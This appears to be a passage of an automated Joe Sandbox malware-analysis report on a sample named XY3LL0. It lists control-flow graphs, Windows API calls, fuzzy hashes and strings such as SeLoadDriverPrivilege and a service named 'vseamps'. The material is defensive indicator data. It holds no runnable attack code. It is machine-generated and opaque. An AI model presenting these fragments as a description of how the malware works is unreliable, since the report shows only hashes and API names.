                                                                                            control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 150 140006e96 147->150 151 140006e9b 147->151 149 140006edc-140006ee9 148->149 153 140006f89-140006f8e 149->153 154 140006eef-140006f23 149->154 150->132 151->146 157 140006f95-140006fd6 NtAllocateVirtualMemory 153->157 158 140006f90 153->158 155 140006f25-140006f2d 154->155 156 140006f2f-140006f33 154->156 159 140006f37-140006f7a 155->159 156->159 157->132 160 140006fdc-140007020 157->160 158->132 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->149 162->161 164 140007039-140007058 163->164 165 14000705a-140007062 163->165 164->163 168 14000706e-14000707b 165->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 171 140007096-1400070a9 169->171 172 1400070ab 169->172 173 1400072e2-1400072eb 170->173 174 140007164-14000717a 170->174 171->172 175 1400070ad-1400070db 171->175 176 140007064-14000706a 172->176 174->173 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$@
                                                                                            • API String ID: 0-149943524
                                                                                            • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                                            • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                                                            • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                                            • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 272 140007341-1400073de 264->272 273 14000756c-1400075a2 264->273 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 274 140007552 271->274 275 140007537-140007554 271->275 272->256 273->260 274->260 275->264
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                                            • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                                                            • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                                            • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CreateReadmalloc
                                                                                            • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                                                            • API String ID: 3950102678-3381721293
                                                                                            • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                                            • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                                                            • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                                            • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 25 7ff8fdf91c00-7ff8fdf91c06 26 7ff8fdf91c41-7ff8fdf91c4b 25->26 27 7ff8fdf91c08-7ff8fdf91c0b 25->27 30 7ff8fdf91d68-7ff8fdf91d7d 26->30 28 7ff8fdf91c35-7ff8fdf91c74 call 7ff8fdf92470 27->28 29 7ff8fdf91c0d-7ff8fdf91c10 27->29 45 7ff8fdf91d42 28->45 46 7ff8fdf91c7a-7ff8fdf91c8f call 7ff8fdf92304 28->46 31 7ff8fdf91c12-7ff8fdf91c15 29->31 32 7ff8fdf91c28 __scrt_dllmain_crt_thread_attach 29->32 33 7ff8fdf91d8c-7ff8fdf91da6 call 7ff8fdf92304 30->33 34 7ff8fdf91d7f 30->34 36 7ff8fdf91c21-7ff8fdf91c26 call 7ff8fdf923b4 31->36 37 7ff8fdf91c17-7ff8fdf91c20 31->37 40 7ff8fdf91c2d-7ff8fdf91c34 32->40 48 7ff8fdf91da8-7ff8fdf91dd9 call 7ff8fdf9242c call 7ff8fdf922d4 call 7ff8fdf927b4 call 7ff8fdf925d0 call 7ff8fdf925f4 call 7ff8fdf9245c 33->48 49 7ff8fdf91ddb-7ff8fdf91e0c call 7ff8fdf92630 33->49 38 7ff8fdf91d81-7ff8fdf91d8b 34->38 36->40 50 7ff8fdf91d44-7ff8fdf91d59 45->50 57 7ff8fdf91c95-7ff8fdf91ca6 call 7ff8fdf92374 46->57 58 7ff8fdf91d5a-7ff8fdf91d67 call 7ff8fdf92630 46->58 48->38 59 7ff8fdf91e1d-7ff8fdf91e23 49->59 60 7ff8fdf91e0e-7ff8fdf91e14 49->60 76 7ff8fdf91cf7-7ff8fdf91d01 call 7ff8fdf925d0 57->76 77 7ff8fdf91ca8-7ff8fdf91ccc call 7ff8fdf92778 call 7ff8fdf922c4 call 7ff8fdf922e8 call 7ff8fdf97b10 57->77 58->30 65 7ff8fdf91e65-7ff8fdf91e6d call 7ff8fdf91720 59->65 66 7ff8fdf91e25-7ff8fdf91e2f 59->66 60->59 64 7ff8fdf91e16-7ff8fdf91e18 60->64 71 7ff8fdf91f02-7ff8fdf91f0f 64->71 78 7ff8fdf91e72-7ff8fdf91e7b 65->78 72 7ff8fdf91e31-7ff8fdf91e34 66->72 73 7ff8fdf91e36-7ff8fdf91e3c 66->73 79 7ff8fdf91e3e-7ff8fdf91e44 72->79 73->79 76->45 99 7ff8fdf91d03-7ff8fdf91d0f call 7ff8fdf92620 76->99 77->76 127 7ff8fdf91cce-7ff8fdf91cd5 __scrt_dllmain_after_initialize_c 77->127 86 7ff8fdf91eb3-7ff8fdf91eb5 78->86 87 7ff8fdf91e7d-7ff8fdf91e7f 78->87 82 7ff8fdf91ef8-7ff8fdf91f00 79->82 83 7ff8fdf91e4a-7ff8fdf91e5f call 7ff8fdf91c00 79->83 82->71 83->65 83->82 89 7ff8fdf91eb7-7ff8fdf91eba 86->89 90 7ff8fdf91ebc-7ff8fdf91ed1 call 7ff8fdf91c00 86->90 87->86 94 7ff8fdf91e81-7ff8fdf91ea3 call 7ff8fdf91720 call 7ff8fdf91d68 87->94 89->82 89->90 90->82 108 7ff8fdf91ed3-7ff8fdf91edd 90->108 94->86 122 7ff8fdf91ea5-7ff8fdf91eaa 94->122 115 7ff8fdf91d11-7ff8fdf91d1b call 7ff8fdf92538 99->115 116 7ff8fdf91d35-7ff8fdf91d40 99->116 113 7ff8fdf91ee4-7ff8fdf91ef2 108->113 114 7ff8fdf91edf-7ff8fdf91ee2 108->114 119 7ff8fdf91ef4 113->119 114->119 115->116 126 7ff8fdf91d1d-7ff8fdf91d2b 115->126 116->50 119->82 122->86 126->116 127->76 128 7ff8fdf91cd7-7ff8fdf91cf4 call 7ff8fdf97acc 127->128 128->76
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                            • String ID:
                                                                                            • API String ID: 190073905-0
                                                                                            • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                                            • Instruction ID: 239d2e2aa0e5f630afd95da0c49e829a99bfce3161277890afd3d4d57cdb7100
                                                                                            • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                                            • Instruction Fuzzy Hash: FC819123E082434EFB54AB169C41AB92290EF657E0F844435DB6F877D6FE3CE5468682

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                                                            • String ID: WordpadFilter.db
                                                                                            • API String ID: 868324331-3647581008
                                                                                            • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                                            • Instruction ID: 4b4dee100fb1953de896b3187e264eee163c28022e0da20e7180210532b76672
                                                                                            • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                                            • Instruction Fuzzy Hash: C6316B33F15B4189E700CFA1D8406AD73A5EBA8798F148535EF5E13B88EE38D551C380

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 196 7ff8fdf911b0-7ff8fdf91207 197 7ff8fdf91209-7ff8fdf91222 call 7ff8fdfa1490 196->197 198 7ff8fdf9124b-7ff8fdf9124e 196->198 209 7ff8fdf91224-7ff8fdf91227 197->209 210 7ff8fdf9123e 197->210 199 7ff8fdf91254-7ff8fdf91280 198->199 200 7ff8fdf914b8-7ff8fdf914bf 198->200 202 7ff8fdf91282-7ff8fdf9128f 199->202 203 7ff8fdf912f6-7ff8fdf91335 call 7ff8fdf91b90 call 7ff8fdfa0a50 199->203 204 7ff8fdf914c3-7ff8fdf914ea call 7ff8fdf91b70 200->204 206 7ff8fdf914f1-7ff8fdf914f6 call 7ff8fdf91a40 202->206 207 7ff8fdf91295-7ff8fdf9129c 202->207 231 7ff8fdf91340-7ff8fdf913cb 203->231 220 7ff8fdf914f7-7ff8fdf914ff call 7ff8fdf91110 206->220 213 7ff8fdf912c7-7ff8fdf912cf call 7ff8fdf91b90 207->213 214 7ff8fdf9129e-7ff8fdf912a5 207->214 216 7ff8fdf91241-7ff8fdf91246 209->216 217 7ff8fdf91229-7ff8fdf9123c call 7ff8fdfa1490 209->217 210->216 233 7ff8fdf912d2-7ff8fdf912f1 call 7ff8fdfa0e10 213->233 214->220 221 7ff8fdf912ab-7ff8fdf912b3 call 7ff8fdf91b90 214->221 216->198 217->209 217->210 235 7ff8fdf912b9-7ff8fdf912c5 221->235 236 7ff8fdf914eb-7ff8fdf914f0 call 7ff8fdf979cc 221->236 231->231 234 7ff8fdf913d1-7ff8fdf913da 231->234 233->203 238 7ff8fdf913e0-7ff8fdf91402 234->238 235->233 236->206 241 7ff8fdf91411-7ff8fdf9142c 238->241 242 7ff8fdf91404-7ff8fdf9140e 238->242 241->238 244 7ff8fdf9142e-7ff8fdf91436 241->244 242->241 245 7ff8fdf91498-7ff8fdf914a6 244->245 246 7ff8fdf91438-7ff8fdf9143b 244->246 247 7ff8fdf914b6 245->247 248 7ff8fdf914a8-7ff8fdf914b5 call 7ff8fdf91bcc 245->248 249 7ff8fdf91440-7ff8fdf91449 246->249 247->204 248->247 251 7ff8fdf91455-7ff8fdf91465 249->251 252 7ff8fdf9144b-7ff8fdf91453 249->252 254 7ff8fdf91470-7ff8fdf91496 251->254 255 7ff8fdf91467-7ff8fdf9146e 251->255 252->251 254->245 254->249 255->254
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                            • String ID:
                                                                                            • API String ID: 73155330-0
                                                                                            • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                                            • Instruction ID: 27dd268e295c703b1fe319ae2d46ec32b63cb3f2cd0345d4957c486775d7e7cc
                                                                                            • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                                            • Instruction Fuzzy Hash: BD814923E1978249E7118B3598005B9A694EF6ABE4F148335EF6A577D6FF3CE0928340
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 3526400053-0
                                                                                            • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                                            • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                                                            • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                                            • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                                                            • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                                                            • API String ID: 3408796845-4213300970
                                                                                            • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                                            • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                                                            • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                                            • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                                                            • String ID: ampStopSingletone: logging ended
                                                                                            • API String ID: 2048888615-3533855269
                                                                                            • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                                            • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                                                            • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                                            • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                                            • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                                                            • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                                            • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastManagerOpen$FileModuleName
                                                                                            • String ID: /remove$/service$vseamps
                                                                                            • API String ID: 67513587-3839141145
                                                                                            • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                                            • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                                                            • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                                            • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                                                            • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                                                            • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                                                              • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Load$Library
                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                            • API String ID: 3981747205-232180764
                                                                                            • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                                            • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                                                            • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                                            • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                                                            • String ID:
                                                                                            • API String ID: 4284112124-0
                                                                                            • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                                            • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                                                            • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                                            • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                                                            • String ID: vseamps
                                                                                            • API String ID: 3693165506-3944098904
